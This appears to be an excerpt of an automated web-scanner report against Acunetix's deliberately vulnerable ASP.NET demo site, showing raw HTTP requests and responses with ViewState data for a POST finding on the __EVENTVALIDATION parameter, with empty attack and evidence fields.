Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6541 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,541 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC%2FV3VUyYDVyDam3PHmHmEHBfQA%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKZgbWNCQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGZvvLHX89VirHfgZv59zKO75WKS
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
Response Body - size: 22,875 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnR